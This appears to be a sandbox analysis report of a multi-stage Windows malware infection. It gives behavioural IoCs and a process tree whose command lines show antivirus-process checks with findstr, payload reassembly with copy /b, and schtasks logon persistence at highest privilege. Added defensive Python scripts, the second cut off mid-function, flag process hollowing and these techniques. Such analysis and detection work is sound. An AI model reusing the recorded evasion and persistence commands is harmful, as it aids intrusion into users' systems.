File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | DlRIpsJ.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 | DlRIpsJ.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | DlRIpsJ.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | DlRIpsJ.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes:
3164 AppGate2103v15.exe (x2)
6704 oiktbrfhNygCPSFVdJ1Rkgku.exe (x2)
4480 nO20MXBUGloxh9agdli788Vc.exe (x2)
5976 AppGate2103v01.exe (x2)
-
Suspicious use of SetThreadContext 25 IoCs
Processes (source PID and image, then target PID and image):
4948 Zinckeds.exe set thread context of 2804 RegAsm.exe
3356 rooma.exe set thread context of 4180 New Text Document.exe
3356 rooma.exe set thread context of 3756 netbtugc.exe
3756 netbtugc.exe set thread context of 4180 New Text Document.exe
3756 netbtugc.exe set thread context of 5684 Firefox.exe
5920 crypted.exe set thread context of 2284 RegAsm.exe
2348 aaaaaaaa.exe set thread context of 2580 RegAsm.exe
2464 wxijgyp.exe set thread context of 5276 RegSvcs.exe
4108 time2time.exe set thread context of 1060 msbuild.exe
4240 file300un.exe set thread context of 6312 msbuild.exe
5680 zwuivg.exe set thread context of 5204 RegSvcs.exe
6580 rtx.exe set thread context of 7056 rtx.exe
2148 asdf.exe set thread context of 2312 RegAsm.exe
6360 wsiopohwqsd.exe set thread context of 2364 RegSvcs.exe
6116 QEwecfyhj.exe set thread context of 6488 RegSvcs.exe
5672 gywervcyuj.exe set thread context of 4444 gpupdate.exe
5984 ngown.exe set thread context of 6768 RegSvcs.exe
5052 updater.exe set thread context of 4512 conhost.exe
5052 updater.exe set thread context of 5860 explorer.exe
1016 gHIvTf22qvmZjum.exe set thread context of 6760 gHIvTf22qvmZjum.exe
6284 wmixedwk.exe set thread context of 4292 svchost.exe
4292 svchost.exe set thread context of 1308 svchost.exe
4292 svchost.exe set thread context of 3704 svchost.exe
4292 svchost.exe set thread context of 5240 svchost.exe
5700 sdf34ert3etgrthrthfghfghjfgh.exe set thread context of 1408 katA5E1.tmp
-
Drops file in Program Files directory 35 IoCs
Processes: oaNMFMP.exe, DlRIpsJ.exe, oiii.exe, svchost.exe
File created C:\Program Files (x86)\DQANlvmTAvZU2\SdYGLuLkowAse.dll oaNMFMP.exe
File created C:\Program Files (x86)\DQANlvmTAvZU2\tPTBJIh.xml oaNMFMP.exe
File created C:\Program Files (x86)\ADJLsahCU\dGukws.dll oaNMFMP.exe
File created C:\Program Files (x86)\ADJLsahCU\HaouQex.xml oaNMFMP.exe
File created C:\Program Files (x86)\PZjcxajBIsNTC\juFMLuc.dll oaNMFMP.exe
File created C:\Program Files (x86)\PZjcxajBIsNTC\xwTsNCD.xml oaNMFMP.exe
File created C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\MfxMMeg.dll oaNMFMP.exe
File created C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\DogRzDq.xml oaNMFMP.exe
File created C:\Program Files (x86)\mWJfrhglotUn\VcRFEMZ.dll oaNMFMP.exe
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi oaNMFMP.exe
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi oaNMFMP.exe
File created C:\Program Files (x86)\DQANlvmTAvZU2\NAqzQYE.xml DlRIpsJ.exe
File created C:\Program Files (x86)\DQANlvmTAvZU2\YADAKnkZABmgj.dll DlRIpsJ.exe
File created C:\Program Files (x86)\ADJLsahCU\AAnZBg.dll DlRIpsJ.exe
File created C:\Program Files (x86)\ADJLsahCU\xFHDGyR.xml DlRIpsJ.exe
File created C:\Program Files (x86)\PZjcxajBIsNTC\jOQorQH.dll DlRIpsJ.exe
File created C:\Program Files (x86)\PZjcxajBIsNTC\VpmQlsw.xml DlRIpsJ.exe
File created C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\UHNAHEo.xml DlRIpsJ.exe
File created C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\vMlmyJm.dll DlRIpsJ.exe
File created C:\Program Files (x86)\mWJfrhglotUn\AQyTknk.dll DlRIpsJ.exe
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak DlRIpsJ.exe
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak DlRIpsJ.exe
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja DlRIpsJ.exe
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi DlRIpsJ.exe
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi DlRIpsJ.exe
File created C:\Program Files\Windows Media Player\wmixedwk.exe oiii.exe
File opened for modification C:\Program Files\Windows Media Player\wmixedwk.exe oiii.exe
File created C:\Program Files\Windows Media Player\background.jpg oiii.exe
File created C:\Program Files\Windows Media Player\mpsvc.dll oiii.exe
File created C:\Program Files\Windows Media Player\wmpnetwk.exe oiii.exe
File opened for modification C:\Program Files\Windows Media Player\ppqqxds svchost.exe
File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe
File opened for modification C:\Program Files\Windows Media Player\ppqqxpa svchost.exe
File opened for modification C:\Program Files\Windows Media Player\ppqqxpp svchost.exe
File opened for modification C:\Program Files\Windows Media Player\mpsvc.dll svchost.exe
-
Drops file in Windows directory 7 IoCs
Processes: schtasks.exe
File created C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job schtasks.exe
File opened for modification C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job schtasks.exe
File created C:\Windows\Tasks\XyyyteIMwZeutaZuw.job schtasks.exe
File opened for modification C:\Windows\Tasks\XyyyteIMwZeutaZuw.job schtasks.exe
File created C:\Windows\Tasks\FPieTEPPuEmJrhC.job schtasks.exe
File opened for modification C:\Windows\Tasks\FPieTEPPuEmJrhC.job schtasks.exe
File created C:\Windows\Tasks\rrqYunoktxOQmCoCX.job schtasks.exe
-
Launches sc.exe 9 IoCs
Sc.exe is the Windows utility for creating, configuring, starting and stopping services.
Processes:
3600 sc.exe
2180 sc.exe
6592 sc.exe
5368 sc.exe
4728 sc.exe
6700 sc.exe
2356 sc.exe
6112 sc.exe
6764 sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
Processes (WerFault PID, then the crashed target PID and image):
1940 WerFault.exe for 3052 4.exe
4396 WerFault.exe for 4948 Zinckeds.exe
6112 WerFault.exe for 2676 Zinck2.exe
1280 WerFault.exe for 6428 AIrj5QVEYuGuBGBtXUl948x8.exe
2620 WerFault.exe for 5680 zwuivg.exe
2664 WerFault.exe for 6360 wsiopohwqsd.exe
228 WerFault.exe for 2676 Zinck2.exe
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes: AIrj5QVEYuGuBGBtXUl948x8.exe, 4.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AIrj5QVEYuGuBGBtXUl948x8.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AIrj5QVEYuGuBGBtXUl948x8.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AIrj5QVEYuGuBGBtXUl948x8.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4.exe
-
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: Setup.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Setup.exe
-
Creates scheduled task(s) 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe (20 instances)
PIDs: 1960, 6828, 5440, 4008, 6404, 6952, 6896, 752, 6008, 2696, 6972, 6032, 3268, 4988, 2148, 4824, 4580, 6728, 6732, 4240
-
Delays execution with timeout.exe 2 IoCs
Processes:
4940 timeout.exe
5512 timeout.exe
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
3020 tasklist.exe
4920 tasklist.exe
-
Enumerates system info in registry 2 TTPs 6 IoCs
Processes: Install.exe (x2), rundll32.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe (x2)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe (x2)
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe
-
Kills process with taskkill 1 IoCs
Processes:
1572 taskkill.exe
-
Modifies Internet Explorer settings 1 IoCs
Processes: netbtugc.exe
Key created \Registry\User\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 netbtugc.exe
-
Modifies data under HKEY_USERS 64 IoCs
Processes: powershell.exe (several instances), DlRIpsJ.exe, svchost.exe, Install.exe, oaNMFMP.exe
All keys below are under \REGISTRY\USER\.DEFAULT (the SYSTEM profile hive); repeat counts are given where the same key appears more than once.

powershell.exe, Key created under Software\Microsoft\SystemCertificates\:
Root; Root\Certificates; Root\CTLs (x2)
CA\Certificates; CA\CRLs
trust (x2); trust\Certificates; trust\CRLs (x2); trust\CTLs
Disallowed; Disallowed\Certificates (x2)
TrustedPeople (x3); TrustedPeople\Certificates; TrustedPeople\CRLs; TrustedPeople\CTLs
SmartCardRoot (x2); SmartCardRoot\CRLs (x3); SmartCardRoot\CTLs (x3)

powershell.exe, Key created under Software\Policies\Microsoft\SystemCertificates\:
CA (x5); CA\Certificates; CA\CRLs; CA\CTLs
trust; trust\CRLs; trust\CTLs
Disallowed (x2); Disallowed\Certificates (x5); Disallowed\CRLs (x2)
TrustedPeople; TrustedPeople\CTLs (x3)

powershell.exe, other:
Key created Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"

oaNMFMP.exe:
Key created Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing

DlRIpsJ.exe:
Set value (data) Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309dcc000000fb9a790967add111abcd00c04fc30936fa000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"
Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
Key created Software\Microsoft\Windows\CurrentVersion\Explorer
Key created Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8a2ad7b7-0000-0000-0000-d01200000000}

svchost.exe:
Key created Software
Key created Software\Microsoft

Install.exe:
Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
-
Modifies registry class 1 IoCs
Processes: msedge.exe
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{4E125F37-767B-414F-8394-73E979514581} msedge.exe
-
Adds a certificate to the machine Root store 2 IoCs
Processes: RegAsm.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = [certificate blob not reproduced on this page] RegAsm.exe
-
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
4584 Fighting.pif (x20)
4436 start.exe (x24)
3356 rooma.exe (x12)
4772 regasms.exe (x2)
3756 netbtugc.exe (x6)
-
Suspicious behavior: MapViewOfSection 14 IoCs
Processes:
3356 rooma.exe
4180 New Text Document.exe (x2)
3756 netbtugc.exe (x4)
2464 wxijgyp.exe (x2)
5680 zwuivg.exe
6360 wsiopohwqsd.exe
6116 QEwecfyhj.exe
5672 gywervcyuj.exe
5984 ngown.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (PID, image, privileges enabled):
4180 New Text Document.exe: SeDebugPrivilege
3020 tasklist.exe: SeDebugPrivilege
4920 tasklist.exe: SeDebugPrivilege
4436 start.exe: SeDebugPrivilege
4772 regasms.exe: SeDebugPrivilege
4216 svchos.exe: SeDebugPrivilege
5372 jsc.exe: SeDebugPrivilege
2580 RegAsm.exe: SeDebugPrivilege, SeBackupPrivilege, SeSecurityPrivilege (x4)
2284 RegAsm.exe: SeDebugPrivilege
5276 RegSvcs.exe: SeDebugPrivilege
368 powershell.exe: SeDebugPrivilege
1060 msbuild.exe: SeDebugPrivilege
5792 an4IhMEUJGaXcuvcgGd8PX9U.exe: SeManageVolumePrivilege
6312 msbuild.exe: SeDebugPrivilege
6180 powershell.exe: SeDebugPrivilege
5204 RegSvcs.exe: SeDebugPrivilege
4028 powershell.exe: SeDebugPrivilege
3268 WMIC.exe (the same set is enabled twice): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
-
Suspicious use of FindShellTrayWindow 19 IoCs
Processes:
4584 Fighting.pif (x3)
4052 go.exe (x3)
2464 wxijgyp.exe (x2)
5680 zwuivg.exe (x2)
6360 wsiopohwqsd.exe (x2)
6116 QEwecfyhj.exe (x2)
5672 gywervcyuj.exe (x2)
5984 ngown.exe (x2)
7064 crt.tmp
-
Suspicious use of SendNotifyMessage 18 IoCs
Processes:
4584 Fighting.pif (x3)
4052 go.exe (x3)
2464 wxijgyp.exe (x2)
5680 zwuivg.exe (x2)
6360 wsiopohwqsd.exe (x2)
6116 QEwecfyhj.exe (x2)
5672 gywervcyuj.exe (x2)
5984 ngown.exe (x2)
-
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
5028 svcs.exe
4772 regasms.exe
4216 svchos.exe
5372 jsc.exe
6752 server.exe
6364 csrss.exe
1280 XClient.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (source PID and image, then target PID and image; each write is recorded three times unless noted):
4180 New Text Document.exe wrote to memory of 2508 MartDrum.exe
2508 MartDrum.exe wrote to memory of 3428 cmd.exe
4180 New Text Document.exe wrote to memory of 3052 4.exe
3428 cmd.exe wrote to memory of 2356 cmd.exe
4180 New Text Document.exe wrote to memory of 4436 start.exe
4180 New Text Document.exe wrote to memory of 3524 rem.exe
2356 cmd.exe wrote to memory of 3020 tasklist.exe
2356 cmd.exe wrote to memory of 5088 findstr.exe
3524 rem.exe wrote to memory of 5028 svcs.exe
2356 cmd.exe wrote to memory of 4920 tasklist.exe
2356 cmd.exe wrote to memory of 3808 svchost.exe
2356 cmd.exe wrote to memory of 4848 cmd.exe
4180 New Text Document.exe wrote to memory of 3356 rooma.exe
2356 cmd.exe wrote to memory of 1524 cmd.exe
2356 cmd.exe wrote to memory of 3204 cmd.exe
2356 cmd.exe wrote to memory of 4584 Fighting.pif
2356 cmd.exe wrote to memory of 1276 PING.EXE
4584 Fighting.pif wrote to memory of 4376 cmd.exe
4180 New Text Document.exe wrote to memory of 4772 regasms.exe
4180 New Text Document.exe wrote to memory of 2676 Zinck2.exe
4180 New Text Document.exe wrote to memory of 4948 Zinckeds.exe
4948 Zinckeds.exe wrote to memory of 2804 RegAsm.exe (x1)
-
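The SetThreadContext and WriteProcessMemory tables above are the two halves of the classic hollowing sequence (CreateProcess suspended, WriteProcessMemory, SetThreadContext, ResumeThread), so correlating them by source and target PID is the first thing to do with a report like this: a target that receives both from the same source (here 4948 Zinckeds.exe into 2804 RegAsm.exe) is confirmed hollowing, and a SetThreadContext into a signed host such as RegAsm.exe, RegSvcs.exe, msbuild.exe or svchost.exe, or into a second copy of the source image, is the next-best signal. The Python below is an added triage example, not part of this report or of the sandbox's tooling. It parses the report's own flattened record text (the full SetThreadContext table and a subset of the WriteProcessMemory table are embedded as constructed input); the list of trusted host images and the set of recognised file extensions are analyst assumptions.

```python
"""Correlate SetThreadContext and WriteProcessMemory records from a sandbox report.

Added example. Input is the report's flattened one-line table text; the regex
assumes the exact phrasing "PID <src> set thread context of <dst> <src> <src image>
<dst image>" / "PID <src> wrote to memory of <dst> <src> <src image> <dst image>".
"""
import re
from collections import defaultdict

# Assumption (analyst-chosen, not from the report): signed Microsoft/Mozilla images
# that a dropper has no legitimate reason to retarget. Lower-case for matching.
TRUSTED_HOSTS = {
    "regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe",
    "svchost.exe", "explorer.exe", "conhost.exe", "gpupdate.exe", "firefox.exe",
}

# An image name as it appears in the table: anything (spaces allowed, e.g.
# "New Text Document.exe") up to one of these extensions. Assumed extension list.
NAME = r".+?\.(?:exe|pif|tmp|scr|dll|com)"
RECORD_RE = re.compile(
    r"PID (?P<src_pid>\d+) (?P<op>set thread context of|wrote to memory of) "
    r"(?P<dst_pid>\d+) (?P=src_pid) "
    r"(?P<src>" + NAME + r") (?P<dst>" + NAME + r")(?= PID |$)",
    re.IGNORECASE,
)


def parse_records(table):
    """Yield (op, src_pid, src_image, dst_pid, dst_image) from a flattened table."""
    for m in RECORD_RE.finditer(table.strip()):
        yield (m["op"].lower(), int(m["src_pid"]), m["src"], int(m["dst_pid"]), m["dst"])


def find_hollowing(stc_table, wpm_table):
    """One finding per SetThreadContext record that looks like injection."""
    written = defaultdict(int)  # (src_pid, dst_pid) -> number of WriteProcessMemory records
    for _, sp, _, dp, _ in parse_records(wpm_table):
        written[(sp, dp)] += 1
    findings = []
    for _, sp, src, dp, dst in parse_records(stc_table):
        reasons = []
        if written[(sp, dp)]:
            reasons.append("memory written into target before SetThreadContext")
        if dst.lower() in TRUSTED_HOSTS:
            reasons.append("target is a signed host image")
        if src.lower() == dst.lower():
            reasons.append("target is a second instance of the source image")
        if reasons:
            findings.append({"src_pid": sp, "src": src, "dst_pid": dp, "dst": dst,
                             "reasons": reasons})
    return findings


# Copied from the report's SetThreadContext table (all 25 records), flattened form.
STC_TABLE = (
    "PID 4948 set thread context of 2804 4948 Zinckeds.exe RegAsm.exe "
    "PID 3356 set thread context of 4180 3356 rooma.exe New Text Document.exe "
    "PID 3356 set thread context of 3756 3356 rooma.exe netbtugc.exe "
    "PID 3756 set thread context of 4180 3756 netbtugc.exe New Text Document.exe "
    "PID 3756 set thread context of 5684 3756 netbtugc.exe Firefox.exe "
    "PID 5920 set thread context of 2284 5920 crypted.exe RegAsm.exe "
    "PID 2348 set thread context of 2580 2348 aaaaaaaa.exe RegAsm.exe "
    "PID 2464 set thread context of 5276 2464 wxijgyp.exe RegSvcs.exe "
    "PID 4108 set thread context of 1060 4108 time2time.exe msbuild.exe "
    "PID 4240 set thread context of 6312 4240 file300un.exe msbuild.exe "
    "PID 5680 set thread context of 5204 5680 zwuivg.exe RegSvcs.exe "
    "PID 6580 set thread context of 7056 6580 rtx.exe rtx.exe "
    "PID 2148 set thread context of 2312 2148 asdf.exe RegAsm.exe "
    "PID 6360 set thread context of 2364 6360 wsiopohwqsd.exe RegSvcs.exe "
    "PID 6116 set thread context of 6488 6116 QEwecfyhj.exe RegSvcs.exe "
    "PID 5672 set thread context of 4444 5672 gywervcyuj.exe gpupdate.exe "
    "PID 5984 set thread context of 6768 5984 ngown.exe RegSvcs.exe "
    "PID 5052 set thread context of 4512 5052 updater.exe conhost.exe "
    "PID 5052 set thread context of 5860 5052 updater.exe explorer.exe "
    "PID 1016 set thread context of 6760 1016 gHIvTf22qvmZjum.exe gHIvTf22qvmZjum.exe "
    "PID 6284 set thread context of 4292 6284 wmixedwk.exe svchost.exe "
    "PID 4292 set thread context of 1308 4292 svchost.exe svchost.exe "
    "PID 4292 set thread context of 3704 4292 svchost.exe svchost.exe "
    "PID 4292 set thread context of 5240 4292 svchost.exe svchost.exe "
    "PID 5700 set thread context of 1408 5700 sdf34ert3etgrthrthfghfghjfgh.exe katA5E1.tmp"
)

# Subset of the WriteProcessMemory table: the Zinckeds.exe chain plus ordinary
# parent-to-child spawns for contrast. The report lists each write three times.
WPM_TABLE = (
    "PID 4180 wrote to memory of 4948 4180 New Text Document.exe Zinckeds.exe " * 3
    + "PID 4948 wrote to memory of 2804 4948 Zinckeds.exe RegAsm.exe "
    + "PID 4180 wrote to memory of 3356 4180 New Text Document.exe rooma.exe " * 3
    + "PID 2356 wrote to memory of 1276 2356 cmd.exe PING.EXE " * 3
)

if __name__ == "__main__":
    for f in find_hollowing(STC_TABLE, WPM_TABLE):
        print(f"{f['src_pid']} {f['src']} -> {f['dst_pid']} {f['dst']}: {'; '.join(f['reasons'])}")
```

Running it flags 21 of the 25 SetThreadContext records; the four it leaves alone (rooma.exe and netbtugc.exe retargeting the original sample, rooma.exe into netbtugc.exe, and the katA5E1.tmp target) are still worth a look by hand, since the host list is deliberately narrow and the WriteProcessMemory table on this page is truncated at 64 entries.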
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
5796 attrib.exe
3156 attrib.exe
Processes
-
1⤵ C:\Windows\Explorer.EXE
   cmdline: C:\Windows\Explorer.EXE
-
2⤵ C:\Users\Admin\AppData\Local\Temp\New Text Document.exe
   cmdline: "C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"
- Checks computer location settings
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
3⤵ C:\Users\Admin\AppData\Local\Temp\a\MartDrum.exe
   cmdline: "C:\Users\Admin\AppData\Local\Temp\a\MartDrum.exe"
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
4⤵ C:\Windows\SysWOW64\cmd.exe
   cmdline: "C:\Windows\System32\cmd.exe" /k cmd < Tunisia & exit
- Suspicious use of WriteProcessMemory
-
5⤵ C:\Windows\SysWOW64\cmd.exe
   cmdline: cmd
- Suspicious use of WriteProcessMemory
-
6⤵ C:\Windows\SysWOW64\tasklist.exe
   cmdline: tasklist
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
6⤵ C:\Windows\SysWOW64\findstr.exe
   cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
-
6⤵ C:\Windows\SysWOW64\tasklist.exe
   cmdline: tasklist
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
6⤵ C:\Windows\SysWOW64\findstr.exe
   cmdline: findstr /I "wrsa.exe"
-
6⤵ C:\Windows\SysWOW64\cmd.exe
   cmdline: cmd /c mkdir 18721
-
6⤵ C:\Windows\SysWOW64\cmd.exe
   cmdline: cmd /c copy /b Cock + Enhance + Forest + Grocery + Mall 18721\Fighting.pif
-
6⤵ C:\Windows\SysWOW64\cmd.exe
   cmdline: cmd /c copy /b Amd + Backed 18721\Q
-
6⤵ C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\18721\Fighting.pif
   cmdline: 18721\Fighting.pif 18721\Q
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
6⤵ C:\Windows\SysWOW64\PING.EXE
   cmdline: ping -n 5 localhost
- Runs ping.exe
-
3⤵ C:\Users\Admin\AppData\Local\Temp\a\4.exe
   cmdline: "C:\Users\Admin\AppData\Local\Temp\a\4.exe"
- Executes dropped EXE
- Checks SCSI registry key(s)
-
4⤵ C:\Windows\SysWOW64\WerFault.exe
   cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 352
- Program crash
-
3⤵ C:\Users\Admin\AppData\Local\Temp\a\start.exe
   cmdline: "C:\Users\Admin\AppData\Local\Temp\a\start.exe"
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
4⤵ C:\Windows\SysWOW64\cmd.exe
   cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchos" /tr '"C:\Users\Admin\AppData\Roaming\svchos.exe"' & exit
-
5⤵ C:\Windows\SysWOW64\schtasks.exe
   cmdline: schtasks /create /f /sc onlogon /rl highest /tn "svchos" /tr '"C:\Users\Admin\AppData\Roaming\svchos.exe"'
- Creates scheduled task(s)
-
4⤵ C:\Windows\SysWOW64\cmd.exe
   cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3A.tmp.bat""
-
5⤵ C:\Windows\SysWOW64\timeout.exe
   cmdline: timeout 3
- Delays execution with timeout.exe
-
5⤵ C:\Users\Admin\AppData\Roaming\svchos.exe
   cmdline: "C:\Users\Admin\AppData\Roaming\svchos.exe"
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
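The MartDrum.exe subtree (cmd reading its script from a redirected extension-less file, tasklist output searched with findstr for security-product image names, Fighting.pif reassembled from five fragments with copy /b, ping -n 5 localhost as a sleep) and the start.exe subtree (schtasks /create at logon with /rl highest pointing at a binary under AppData\Roaming, timeout 3) are the tradecraft a detection engineer wants rules for. The Python below is an added example, not part of this report or of the sandbox: rule-based triage of Windows command lines, run here over the command lines from the tree above, re-typed as constructed input. The AV image list and the user-writable path list are analyst assumptions.

```python
"""Flag dropper tradecraft in Windows command lines (added example).

Rules: cmd fed a script via stdin redirect; findstr over security-product image
names; copy /b reassembly of a binary from fragments; ping/timeout sleeps;
schtasks logon persistence from a user-writable path.
"""
import re

# Assumption: image names of common endpoint-protection GUIs/services.
AV_IMAGES = {
    "avastui.exe", "avgui.exe", "nswscsvc.exe", "sophoshealth.exe", "wrsa.exe",
    "msmpeng.exe", "mbamservice.exe", "ekrn.exe", "bdagent.exe",
}
EXEC_EXT = (".exe", ".pif", ".scr", ".com", ".bat", ".cmd", ".dll")

STDIN_CMD = re.compile(r"\bcmd(?:\.exe)?\b[^<]*<\s*(?P<src>\S+)", re.I)
FINDSTR = re.compile(r'\bfindstr\b.*?"(?P<pats>[^"]+)"', re.I)
COPY_B = re.compile(r"\bcopy\s+/b\s+(?P<parts>.+?)\s+(?P<dst>\S+)\s*$", re.I)
DELAY = re.compile(
    r"\b(?:ping\s+-n\s+(?P<n>\d+)\s+(?:localhost|127\.0\.0\.1)"
    r"|timeout\s+(?:/t\s+)?(?P<t>\d+))", re.I)
SCHTASKS = re.compile(r"\bschtasks\b.*?/create\b", re.I)
# Assumption: directories an unprivileged user can write to.
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData|Public)\\", re.I)


def _opt(cmdline, flag):
    """Value of a schtasks-style option, e.g. _opt(cl, '/sc') -> 'onlogon'."""
    m = re.search(re.escape(flag) + r"\s+(\S+)", cmdline, re.I)
    return m.group(1).lower() if m else None


def analyze(cmdline):
    """Return a list of (technique, detail) findings for one command line."""
    out = []
    if m := STDIN_CMD.search(cmdline):
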